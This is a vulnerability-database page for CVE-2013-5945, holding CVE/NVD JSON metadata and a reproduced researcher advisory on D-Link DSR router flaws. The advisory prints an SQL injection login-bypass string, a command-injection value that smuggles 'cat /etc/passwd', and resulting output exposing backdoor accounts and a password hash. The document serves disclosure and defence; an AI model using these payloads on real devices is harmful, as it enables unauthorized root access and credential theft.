CVE-2013-5945 (GCVE-0-2013-5945)

Vulnerability from cvelistv5

Published

2020-02-11 01:54

Modified

2024-08-06 17:29

Severity ?

CWE

Summary

References

URL	Tags
cve@mitre.org	http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf	Broken Link
cve@mitre.org	http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf	Broken Link
cve@mitre.org	http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf	Broken Link
cve@mitre.org	http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf	Broken Link
cve@mitre.org	http://www.exploit-db.com/exploits/30061	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://www.exploit-db.com/exploits/30061	Exploit, Third Party Advisory, VDB Entry

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:29:42.358Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/30061"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-10-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-11T01:54:15",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.exploit-db.com/exploits/30061"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-5945",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
            },
            {
              "name": "http://www.exploit-db.com/exploits/30061",
              "refsource": "MISC",
              "url": "http://www.exploit-db.com/exploits/30061"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-5945",
    "datePublished": "2020-02-11T01:54:15",
    "dateReserved": "2013-09-27T00:00:00",
    "dateUpdated": "2024-08-06T17:29:42.358Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2013-5945\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2020-02-11T12:15:11.757\",\"lastModified\":\"2024-11-21T01:58:28.210\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua.\"},{\"lang\":\"es\",\"value\":\"M\u00faltiples vulnerabilidades de inyecci\u00f3n SQL en dispositivos D-Link DSR-150 con versi\u00f3n de firmware anterior a 1.08B44; DSR-150N con versiones de firmware anteriores a 1.05B64; DSR-250 y DSR-250N con versiones de firmware anteriores a 1.08B44; y DSR-500, DSR-500N, DSR-1000 y DSR-1000N con versiones de firmware anteriores a 1.08B77, permiten a atacantes remotos ejecutar comandos SQL arbitrarios por medio de la contrase\u00f1a para (1) la funci\u00f3n login.authenticate en los archivos share/lua/5.1/teamf1lualib/login.lua o (2) cautivePortal.lua.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:C/I:C/A:C\",\"baseScore\":10.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.08b44\",\"matchCriteriaId\":\"2BD73A85-9D52-4389-A555-D6FDB737AE59\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2F9246BA-7F85-4564-B1B5-03BBBF9E2F35\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.05b64\",\"matchCriteriaId\":\"A6953E43-A7B5-4F35-BF7D-CE75FB2FA96D\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"729C8468-E3D3-4089-B095-A41C719E9F8C\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.08b44\",\"matchCriteriaId\":\"51C91D3D-52F0-405F-B652-45DFC3C0C673\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.08b44\",\"matchCriteriaId\":\"A6763ED3-B6F2-4BC4-88DC-DDF383A40761\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E8754060-E58E-4A9A-AB59-0279E8BC793A\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.08b77\",\"matchCriteriaId\":\"E80E081B-1FB5-4B37-A054-7F6D3A507B47\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ABF00635-340E-4116-8B4A-46138C13C9C3\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.08b77\",\"matchCriteriaId\":\"C49E10FB-39AA-4193-8EFE-815EE72ADA6E\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4B085DCB-4804-43ED-8634-0B4EB8DCD750\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.08b77\",\"matchCriteriaId\":\"93C7AF3E-A7B6-47D6-A3DD-26E28398843B\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AFF423A8-2E0B-4618-B384-5C97B4315B88\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.08b77\",\"matchCriteriaId\":\"F33EBB05-D58C-47C0-9EB7-D0F03C027169\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A\"}]}]}],\"references\":[{\"url\":\"http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf\",\"source\":\"cve@mitre.org\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf\",\"source\":\"cve@mitre.org\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf\",\"source\":\"cve@mitre.org\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf\",\"source\":\"cve@mitre.org\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://www.exploit-db.com/exploits/30061\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://www.exploit-db.com/exploits/30061\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]}]}}"
  }
}

var-202002-0660

Vulnerability from variot

Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. #

CVEs:

CVE-2013-5945 - Authentication Bypass by SQL-Injection

CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution

Vulnerable Routers:

D-Link DSR-150 (Firmware < v1.08B44)

D-Link DSR-150N (Firmware < v1.05B64)

D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)

D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)

D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)

Download URL:

http://tsd.dlink.com.tw

Arch:

mips and armv6l, Linux

Author:

0_o -- null_null

nu11.nu11 [at] yahoo.com

Date:

2013-08-18

Purpose:

Get a non-persistent root shell on your D-Link DSR.

Prerequisites:

Network access to the router ports 443 and 23.

!!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!

A list of identified vulns follows. This list is not exhaustive as I assume

more vulns are present that just slipped my attention.

The fact that D-Link implemented a backdoor user (for what reason, please??)

and just renamed it instead of completely removing it after it was targetted

by my previous exploit, as well as the triviality of those vulns I found

makes me suggest that more vulns are present that are comparably easy to

exploit.

Since 2013-12-03, patches are available for:

DSR-150: Firmware v1.08B44

DSR-150N: Firmware v1.05B64

DSR-250 and DSR-250N: Firmware v1.08B44

DSR-500 and DSR-500N: Firmware v1.08B77

DSR-1000 and DSR-1000N: Firmware v1.08B77

via http://tsd.dlink.com.tw

And now, have a worthwhile read :-)

Contents:
Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
Exposure: D-Link backdoor user
Vulnerability: Use of weak hash algorithms
Exposure: Passwords are stored as plain text in config files
Vulnerability: Bad permissions on /etc/shadow
Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
Possible via the global webUI login form.
File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

function login.authenticate(tablename, tableInput) local username = tableInput["Users.UserName"] local password = tableInput["Users.Password"] local cur = db.execute(string.format([[ SELECT *, ROWID AS ROWID FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password)) local result = false local statusCode = "NONE" if cur then local row = cur:fetch({}, "a") cur:close() result = row ~= nil if result == false then statusCode = "USER_LOGIN_INVALID_PASSWORD" end end return result, statusCode end

This function creates an SQL statement of the form:

SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:

username = admin password = ' or 'a'='a

...resulting in this SQL statement:

SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';

Old school SQL injection. Ohh, by the way...
The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --
Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
Possible from the Tools --> System Check page.
File /pfrm2.0/var/www/systemCheck.htm contains:

local function runShellCmd(command) local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout local cmdOutput = pipe:read("*a") pipe:close() return cmdOutput end if (ButtonType and ButtonType == "ping") then [...] local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile globalCmdOutput = runShellCmd (cmd_ping) statusMessage = "Pinging " .. ipToPing [...] elseif (ButtonType and ButtonType == "traceroute") then [...] local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options globalCmdOutput = runShellCmd(cmd) statusMessage = "Traceroute To " .. ipToTraceRoute .. "..." [...] elseif (ButtonType and ButtonType == "dnslookup") then [...] util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile)) statusMessage = "DNS Lookup for " .. internetNameToNsLookup [...]

Command injection is possible in at least these form sections:

Ping or Trace an IP Address Perform a DNS Lookup

When using a browser, deactivate the "onclick" JavaScript checks using a tool like Firebug. Tools like curl are not hindered by these checks.
All forms allow input like this:

localhost;

example:

localhost;cat /etc/passwd

This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section.
Output from user provided commands gets displayed on the next page beneath the benign command output.

example:

[...]
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh </textarea> [...] 3. Exposure: D-Link backdoor user: * This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW: root:!:0:0:root:/root:/bin/sh gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh admin:x:0:2:Linux User,,,:/home/admin:/bin/sh * You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one. * I verified this by showing the /etc/profile: # /etc/profile LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib PATH=.:/pfrm2.0/bin:$PATH CLISH_PATH=/etc/clish export PATH LD_LIBRARY_PATH CLISH_PATH # redirect all users except root to CLI if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then trap "/bin/login" SIGINT trap "" SIGTSTP /pfrm2.0/bin/cli exit fi PS1='DSR-250N> ' 4. Vulnerability: Use of weak hash algorithms: * In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet. * An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password. 5. Exposure: Passwords are stored as plain text in config files: * A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text. Example: [...] Users = {} Users[1] = {} Users[1]["Capabilities"] = "" Users[1]["DefaultUser"] = "1" Users[1]["UserId"] = "1" Users[1]["FirstName"] = "backdoor" Users[1]["OID"] = "0" Users[1]["GroupId"] = "1" Users[1]["UserName"] = "gkJ9232xXyruTRmY" Users[1]["Password"] = "thisobviouslyisafakepass" Users[1]["UserTimeOut"] = "10" Users[1]["_ROWID_"] = "1" Users[1]["LastName"] = "ssl" [...] 6. Vulnerability: Bad permissions on /etc/shadow * This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway. DSR-250N> ls -l -a /etc/shadow -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow DSR-250N> ps PID USER VSZ STAT COMMAND 1 root 2700 S init 2 root 0 SW< [kthreadd] 3 root 0 SW< [ksoftirqd/0] 4 root 0 SW< [events/0] 5 root 0 SW< [khelper] 8 root 0 SW< [async/mgr] 111 root 0 SW< [kblockd/0] 120 root 0 SW< [khubd] 123 root 0 SW< [kseriod] 128 root 0 SW< [kslowd] 129 root 0 SW< [kslowd] 150 root 0 SW [pdflush] 151 root 0 SW [pdflush] 152 root 0 SW< [kswapd0] 200 root 0 SW< [aio/0] 210 root 0 SW< [nfsiod] 220 root 0 SW< [crypto/0] 230 root 0 SW< [cns3xxx_spi.0] 781 root 0 SW< [mtdblockd] 860 root 0 SW< [usbhid_resumer] 874 root 0 SW< [rpciod/0] 903 root 0 SWN [jffs2_gcd_mtd4] 909 root 0 SWN [jffs2_gcd_mtd5] 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R 999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db 1049 root 2704 S /usr/sbin/telnetd -l /bin/login 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd 1141 root 37000 S /pfrm2.0/bin/sshd 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5 1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db 1560 root 0 SW< [key_timehandler] 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf 1600 root 8036 S rvgd /tmp/system.db 1612 root 0 SW [cavium] 1621 root 8424 S vpnKAd /tmp/system.db 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh 1771 root 2680 S /pfrm2.0/bin/statusD 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db 2205 root 1904 S /pfrm2.0/bin/fReset 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va 3355 root 1768 S /pfrm2.0/bin/rt2860apd 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn- 5353 root 2704 S -sh 7877 root 2568 S sleep 60 7953 root 2568 S sleep 60 8008 root 2704 R ps 16749 root 2704 S -sh 25690 root 0 SW< 